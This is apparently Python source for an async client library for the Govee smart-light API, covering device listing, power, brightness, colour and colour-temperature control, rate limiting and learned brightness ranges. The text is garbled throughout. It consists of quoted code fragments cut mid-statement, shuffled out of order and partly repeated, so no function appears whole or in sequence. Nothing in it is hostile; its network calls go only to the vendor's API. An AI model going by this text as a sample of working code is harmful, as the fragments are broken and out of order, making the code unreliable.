rate_limit_reset(self):", "values\" else: red = color[0] green = color[1] blue = color[2] if red", "= {} if device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what", "in err: # Unsupported Cmd Value # set brightness as 0..100 as 0..254", "device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device = 
self._get_device(device) return device", "brightness_set) if err: # try again with 0-100 range if \"API-Error 400\" in", "all dicts with one element if \"online\" in prop: prop_online = prop[\"online\"] is", "self._rate_limit_on = 5 # safe available call count for multiple processes self._limit =", "{response.status} on command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\")", "# cache last get_devices result self._devices = devices return self.devices, err def _get_device(self,", "prop_color = (0, 0, 0) prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]: #", "% repr(ex) if err: class error_response: def __init__(self, err_msg): self._err_msg = err_msg status", "{ex}\") if limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay a call when", "True # assume we are online self.events = Events() self._api_key = api_key self._devices", "multiple processes self._limit = 100 self._limit_remaining = 100 self._limit_reset = 0 self._config_offline_is_off =", "error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await response.text()", "= Events() self._api_key = api_key self._devices = {} self._rate_limit_on = 5 # safe", "color: Tuple[int, int, int] color_temp: int timestamp: int source: str error: str lock_set_until:", "content manager response yield response except aiohttp.ClientError as ex: # we are offline", "self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else: text = await response.text()", "if not self._learning_storage: # use an internal learning storage as long as we", "= True # assume we are online self.events = Events() self._api_key = api_key", "create method if you want to use this Client without an async 
context", "_LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True # assume we are online self.events =", "* 254 / 100) if device.learned_set_brightness_max == 100: # set brightness as 0..100", "return state from history self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object", "device.learned_set_brightness_max == 100: # set brightness as 0..100 brightness_set = brightness_set_100 brightness_result =", "None learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off = False # effenctive state", "seconds\" ) limit_unknown = False except Exception as ex: _LOGGER.warning(f\"Error trying to get", "device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a device, return success and", ") device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else:", "= f\"Invalid device {device_str}, {device}\" else: command = \"turn\" params = onOff result,", "and fire an event on change.\"\"\" if self._online != online: self._online = online", "class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self):", "*, auth=True, url: str, params=None): \"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal( lambda:", "ex: err = \"unknown error: %s\" % repr(ex) if err: class error_response: def", "f\"set_brightness: invalid value {brightness}, allowed range 0 .. 254\" else: if brightness >", "f\"API-Error {response.status}: {result}\" # cache last get_devices result self._devices = devices return self.devices,", "for {seconds_locked} seconds. 
Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\":", "async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices =", "self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff == \"on\" return success, err async def", "we are online self.events = Events() self._api_key = api_key self._devices = {} self._rate_limit_on", "await self._control(device, command, brightness_set) if err: # try again with 0-100 range if", "): _LOGGER.debug( \"learned device %s uses range 0-%s for getting brightness state.\", device.device,", "= False # autobrightness learning if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max ==", "device = self._get_device(device) result = None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if", "return self.online async def ping(self) -> Tuple[float, str]: \"\"\"Ping the api endpoint. 
No", "off a device, return success and error message.\"\"\" return await self._turn(device, \"off\") async", "will set self.online await self.ping() except: pass return self.online async def ping(self) ->", "def set_brightness( self, device: Union[str, GoveeDevice], brightness: int ) -> Tuple[bool, str]: \"\"\"Set", "async context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request headers with/without", "\"\"\"Given an aiohttp result checks if it is a success result.\"\"\" return \"message\"", "if not device: err = f\"Invalid device {device_str}, {device}\" else: if brightness <", "device, command, brightness_set ) if not err: device.learned_set_brightness_max = 100 await self._learn(device) else:", "None _LOGGER.debug( f\"state returned from API: {json_obj}, resulting state object: {result}\" ) else:", "1 async def rate_limit_delay(self): \"\"\"Delay a call when rate limiting is active.\"\"\" #", "learning_infos = {} if device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output", "self._set_online(False) err = \"error from aiohttp: %s\" % repr(ex) except Exception as ex:", "this will set self.online await self.ping() except: pass return self.online async def ping(self)", "device %s uses range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device", "or False by default. False: an offline device doesn't change power state. 
True:", "range 0-100 up to 0-254 prop_brightness = math.floor( prop_brightness * 254 / 100", "success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color return success, err", "for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"]", "= prop[\"online\"] is True elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"] == \"on\"", "learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for getting", "False prop_power_state = False prop_brightness = False prop_color = (0, 0, 0) prop_color_temp", "device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str, GoveeDevice], color_temp:", "err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp", "device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state for one specific device.\"\"\"", "ping_ok_delay = max(1, delay) else: err = f\"API-Result wrong: {result}\" else: result =", "Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device by address or GoveeDevice DTO.", "green must be within 0 .. 254\" elif blue < 0 or blue", "global behavour when device is offline. None: default, use config_offline_is_off from learning, or", "devices elif isinstance(device, str) and device_str in self._devices: device = self._devices[device_str] else: raise", "rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting. Defaults to 5, which means there", "def rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting. 
Defaults to 5, which means", "\"\"\"Get the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool):", "= await self._control(device, command, color_temp) if not err: success = self._is_success_result_message(result) if success:", "async def close(self): \"\"\"Use close when your are finished with the Client without", "just changed something, return state from history self._devices[device_str].source = \"history\" result = self._devices[device_str]", "an aiohttp result checks if it is a success result.\"\"\" return \"message\" in", "def ping(self) -> Tuple[float, str]: \"\"\"Ping the api endpoint. No API_KEY is needed.\"\"\"", "an async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async", "= self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result", "\"\"\" Set global behavour when device is offline. None: default, use config_offline_is_off from", "if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping", "must be above 1\") self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get the global", "\"\"\"Last request was able to connect to the API.\"\"\" return self._online def _set_online(self,", "device.device, ) changed = True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await", "= ( f\"set_color: invalid value {color}, red must be within 0 .. 254\"", "self._devices = {} self._rate_limit_on = 5 # safe available call count for multiple", "these are all dicts with one element if \"online\" in prop: prop_online =", "must be within 0 .. 
254\" else: command = \"color\" command_color = {\"r\":", "# set brightness as 0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100 command =", "= learning_storage if not self._learning_storage: # use an internal learning storage as long", "self._turn(device, \"on\") async def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off", "Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a device, return success and error", "def _set_online(self, online: bool): \"\"\"Set the online state and fire an event on", "_get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds -", "%s uses range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max", "prop_power_state = False elif device.config_offline_is_off: # learning option prop_power_state = False # autobrightness", "raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp", "doesn't change power state. True: an offline device is shown as off. \"\"\"", "device: err = f\"Invalid device {device_str}, {device}\" else: if len(color) != 3: err", "seconds. 
Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model, \"cmd\":", "await response.json() prop_online = False prop_power_state = False prop_brightness = False prop_color =", "# The time at which the current rate limit window resets in UTC", "self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will be reset.\"\"\" return", "await response.text() err = f\"API-Error {response.status} on command {cmd}: {text} for device {device}\"", "str controllable: bool retrievable: bool support_cmds: List[str] support_turn: bool support_brightness: bool support_color: bool", "200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() +", "to make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of requests remaining", "one element if \"online\" in prop: prop_online = prop[\"online\"] is True elif \"powerState\"", "header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number of requests you're permitted", "<= self.rate_limit_on: # do we need to sleep? 
sleep_sec = self.rate_limit_reset_seconds if sleep_sec", "{\"r\": red, \"g\": green, \"b\": blue} result, err = await self._control(device, command, command_color)", "defaults by some conditions if not is_retrievable: learned_get_brightness_max = -1 if model_str ==", "# autobrightness learning if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max == 100 and", "False err = None device_str, device = self._get_device(device) if not device: err =", "= ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"]", "_RATELIMIT_RESET in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset =", "== \"H6104\": before_set_brightness_turn_on = True # load learned/configured values if device_str in learning_infos:", "current rate limit window resets in UTC epoch seconds. # return state from", "self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting. 
Defaults", "value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def", "command: str, params: Any ) -> Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\"", "\"\"\"Use close when your are finished with the Client without using an async", "must be below {self._limit}\" ) if val < 1: raise GoveeError(f\"Rate limiter threshold", "from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\"", "rate limiting.\"\"\" if val > self._limit: raise GoveeError( f\"Rate limiter threshold {val} must", "import datetime from events import Events from typing import Any, List, Optional, Tuple,", "if self._session: await self._session.close() self._session = None def __init__( self, api_key: str, *,", "this Client without an async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__()", "state and fire an event on change.\"\"\" if self._online != online: self._online =", "\"message\" in result and result[\"message\"] == \"Success\" async def turn_on(self, device: Union[str, GoveeDevice])", "rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at which the current", "@dataclass class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device: str model: str device_name:", "learning_infos[device.device] = GoveeLearnedInfo() # output what was lerned, and learn if ( learning_infos[device.device].set_brightness_max", "to sleep? 
sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active,", "if err: class error_response: def __init__(self, err_msg): self._err_msg = err_msg status = -1", "254\" elif blue < 0 or blue > 255: err = f\"set_color: invalid", "def _get_device_state( self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state for", "= f\"set_color: invalid value {color}, green must be within 0 .. 254\" elif", "GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device by address or GoveeDevice DTO. returns:", "except Exception as ex: _LOGGER.warning(f\"Error trying to get rate limits: {ex}\") if limit_unknown:", "0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\" )", "is not None: # global option if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off:", "all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state, err = await", "prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property", "if self._online != online: self._online = online # inform about state change self.events.online(self._online)", "in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state online=True, power_state=False, brightness=0, color=(0,", "if other devices also utilize the govee API\" ) limit_unknown = True if", "self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result >", "device {device_str}, {device}\" else: command = \"turn\" params = onOff result, err =", "async def text(self): return self._err_msg yield error_response(\"_api_request_internal: \" + err) def _utcnow(self): \"\"\"Helper", "# return state 
from hisory for n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS", "f\"Invalid device {device_str}\" elif not device.retrievable: # device {device_str} isn't able to return", "-> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = [] for dev in self._devices: lst.append(self._devices[dev])", "support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state online=True, power_state=False, brightness=0,", "err = None if not device: err = f\"Invalid device {device_str}, {device}\" else:", "def __init__(self, err_msg): self._err_msg = err_msg status = -1 async def text(self): return", "command, command_color) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow", "else: if brightness_set > 100: device.learned_set_brightness_max = 254 await self._learn(device) if not err:", "# this will set self.online await self.ping() except: pass return self.online async def", "global option if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: # learning option prop_power_state", "Unsupported Cmd Value # set brightness as 0..100 as 0..254 didn't work brightness_set", "range 0 .. 254\" else: if brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device)", "str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an API_KEY and storage", "err = f\"Invalid device {device_str}, {device}\" else: command = \"turn\" params = onOff", "address or GoveeDevice DTO. 
returns: device_address, device_dto \"\"\" device_str = device if isinstance(device,", "Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\" device_str, device = self._get_device(device) cmd =", "\"\"\"Track rate limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate limit exceeded, check if", "254 / 100) if device.learned_set_brightness_max == 100: # set brightness as 0..100 brightness_set", "== result: ping_ok_delay = max(1, delay) else: err = f\"API-Result wrong: {result}\" else:", "-> bool: \"\"\"Given an aiohttp result checks if it is a success result.\"\"\"", "return self.devices async def _get_device_state( self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]:", "async with self._api_get(url=_API_DEVICES) as response: if response.status == 200: result = await response.json()", "self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC", "in prop: prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\" in prop: prop_brightness =", "== \"on\" elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif \"color\" in prop:", "self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result =", "learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off = False # effenctive state #", "GoveeDevice]: \"\"\"Get a device by address or GoveeDevice DTO. returns: device_address, device_dto \"\"\"", "elif device.config_offline_is_off: # learning option prop_power_state = False # autobrightness learning if device.learned_get_brightness_max", "# try again with 0-100 range if \"API-Error 400\" in err: # Unsupported", "def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for", "active.\"\"\" # do we have requests left? 
if self.rate_limit_remaining <= self.rate_limit_on: # do", "GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed = False # init Dict and entry", "sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping for", "Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\"", "onOff == \"on\" return success, err async def set_brightness( self, device: Union[str, GoveeDevice],", "try again with 0-100 range if \"API-Error 400\" in err: # Unsupported Cmd", "\"history\" self._devices[device_str].power_state = onOff == \"on\" return success, err async def set_brightness( self,", "Any ) -> Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\" device_str, device =", "dev in self._devices: lst.append(self._devices[dev]) return lst def device(self, device) -> GoveeDevice: \"\"\"Single device", "and error message.\"\"\" return await self._turn(device, \"off\") async def _turn( self, device: Union[str,", "lerned, and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s", "you want to use this Client without an async context manager.\"\"\" self =", "_API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL", "bool # this is the learning config, possibly overridden by a global config", "_API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\"", "brightness_result > 0 return success, err async def _learn(self, device): \"\"\"Persist learned information", "response: result = await response.text() delay = int((time.time() - start) * 1000) if", "if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff == \"on\"", "< 
0 or blue > 255: err = f\"set_color: invalid value {color}, blue", "sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is counted", "response.text() delay = int((time.time() - start) * 1000) if response.status == 200: if", "method to get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track", "controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\" Govee Device DTO", "get_devices result self._devices = devices return self.devices, err def _get_device(self, device: Union[str, GoveeDevice])", "(r, g, b) where each value may be in range 0-255 \"\"\" success", "{device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return result, err async def get_states(self) ->", "{device_str} not possible: {err}\") return result, err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request", "self._config_offline_is_off = val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst =", "manager enter.\"\"\" self._session = aiohttp.ClientSession() return self async def __aexit__(self, *err): \"\"\"Async context", "on change.\"\"\" if self._online != online: self._online = online # inform about state", ") -> Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\" device_str, device = self._get_device(device)", "self._devices[device_str].power_state = onOff == \"on\" return success, err async def set_brightness( self, device:", "{device_str} not possible: {err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked:", "govee API\" ) limit_unknown = True if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING", "result.source = \"api\" result.error = None _LOGGER.debug( f\"state returned from API: {json_obj}, resulting", "API\" ) limit_unknown = True if ( _RATELIMIT_TOTAL in response.headers 
and _RATELIMIT_REMAINING in", "down from this value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return", "% repr(ex) except Exception as ex: err = \"unknown error: %s\" % repr(ex)", "prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]: # somehow these are all dicts", "and _RATELIMIT_RESET in response.headers ): try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset", "{err}\") return result, err async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for all", "List[GoveeDevice]: \"\"\"Request states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices:", "device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for getting brightness state.\",", "if isinstance(device, GoveeDevice): device_str = device.device if not device_str in self._devices: device =", "device_str, device = self._get_device(device) cmd = {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\")", "{seconds_locked} seconds\" ) else: params = {\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE,", "conditions if not is_retrievable: learned_get_brightness_max = -1 if model_str == \"H6104\": before_set_brightness_turn_on =", "-> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success = False err = None", "return {} @asynccontextmanager async def _api_put(self, *, auth=True, url: str, json): \"\"\"API HTTP", "result checks if it is a success result.\"\"\" return \"message\" in result and", "max(1, math.floor(brightness * 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100)", "= 1 @dataclass class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device: str model:", "if device_str in learning_infos: learning_info = learning_infos[device_str] 
learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max", "Union import aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo,", "async with request_lambda() as response: self._set_online(True) # we got something, so we are", "str device_name: str controllable: bool retrievable: bool support_cmds: List[str] support_turn: bool support_brightness: bool", "_LOGGER.debug(\"get_devices\") devices = {} err = None async with self._api_get(url=_API_DEVICES) as response: if", "response: if response.status == 200: result = await response.json() timestamp = self._utcnow() learning_infos", "in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what was lerned, and learn if", "somehow these are all dicts with one element if \"online\" in prop: prop_online", "set_brightness( self, device: Union[str, GoveeDevice], brightness: int ) -> Tuple[bool, str]: \"\"\"Set brightness", "= (0, 0, 0) prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]: # somehow", "color_temp) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source", "255: err = f\"set_color: invalid value {color}, green must be within 0 ..", "if limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay a call when rate", "err = None async with self._api_get(url=_API_DEVICES) as response: if response.status == 200: result", "if seconds_lock < 0: seconds_lock = 0 return seconds_lock async def _control( self,", "state, return 'history' state self._devices[device_str].source = \"history\" result = self._devices[device_str] elif seconds_locked: #", ") result = self._devices[device_str] result.online = prop_online result.power_state = prop_power_state result.brightness = prop_brightness", "must be 
tuple with (r, g, b) values\" else: red = color[0] green", "brightness_set_100 = 0 if brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness * 100", "\"error from aiohttp: %s\" % repr(ex) except Exception as ex: err = \"unknown", "str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed = False # init Dict and", "err: _LOGGER.warning(\"error getting state for device %s: %s\", device_str, err, ) self._devices[device_str].error =", "device: err = f\"Invalid device {device_str}\" elif not device.retrievable: # device {device_str} isn't", "overridden by a global config class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class", "No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None err =", "url=url, headers=self._getHeaders(auth), params=params ) ) as response: yield response @asynccontextmanager async def _api_request_internal(self,", "= self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else: if", "if brightness < 0 or brightness > 254: err = f\"set_brightness: invalid value", "DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else: text = await response.text() err =", "url=url, headers=self._getHeaders(auth), json=json ) ) as response: yield response @asynccontextmanager async def _api_get(self,", "as response: result = await response.text() delay = int((time.time() - start) * 1000)", "0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work if we don't sleep", "for getting brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness", "learned information from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached()", "minute. 
_RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of requests remaining in the current", "0 or green > 255: err = f\"set_color: invalid value {color}, green must", "{device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if", "ping_ok_delay, err async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\")", "0 or brightness > 254: err = f\"set_brightness: invalid value {brightness}, allowed range", "2 # do not send another control within n seconds after controlling the", "n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send", "remaining in the current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time", "API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None err = None", "command = \"color\" command_color = {\"r\": red, \"g\": green, \"b\": blue} result, err", "= brightness_result self._devices[device_str].power_state = brightness_result > 0 return success, err async def _learn(self,", "range 0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100:", "success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp =", ") elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\")", "device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send another control within n seconds", "== \"Success\" async def turn_on(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on", "status = -1 async def text(self): return self._err_msg yield error_response(\"_api_request_internal: \" + err)", "device is offline. 
None: default, use config_offline_is_off from learning, or False by default.", "support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state online=True, power_state=False, brightness=0, color=(0, 0, 0),", "\"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params )", "\"\"\"API Methond handling all HTTP calls. This also handles: - rate-limiting - online/offline", "again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key: str, *, learning_storage:", "source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await", "self.events.online(self._online) if not online: # show all devices as offline for device in", "state for device %s: %s\", device_str, err, ) self._devices[device_str].error = err else: self._devices[device_str]", "asyncio import logging import time import math from contextlib import asynccontextmanager from dataclasses", "-> Tuple[bool, str]: \"\"\"Turn off a device, return success and error message.\"\"\" return", "prop[\"brightness\"] elif \"color\" in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif", ") else: params = {\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as", "if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color return success,", "err = f\"set_color: invalid value {color}, green must be within 0 .. 254\"", "if self.rate_limit_remaining <= self.rate_limit_on: # do we need to sleep? 
sleep_sec = self.rate_limit_reset_seconds", "_learn(self, device): \"\"\"Persist learned information from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ]", "invalid value {color}, red must be within 0 .. 254\" ) elif green", "item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults for learned/configured values learned_set_brightness_max = None", "False async def check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\" try: # this", "we are offline self._set_online(False) err = \"error from aiohttp: %s\" % repr(ex) except", "\"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result > 0 return success, err async", "def _api_put(self, *, auth=True, url: str, json): \"\"\"API HTTP Put call.\"\"\" async with", "int ) -> Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success = False err", "\"learned device %s uses range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[", "API client package.\"\"\" import asyncio import logging import time import math from contextlib", "= item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults for learned/configured values learned_set_brightness_max =", "{response.status}: {result}\" # cache last get_devices result self._devices = devices return self.devices, err", "Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async def close(self): \"\"\"Use close when your", "as 0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\" 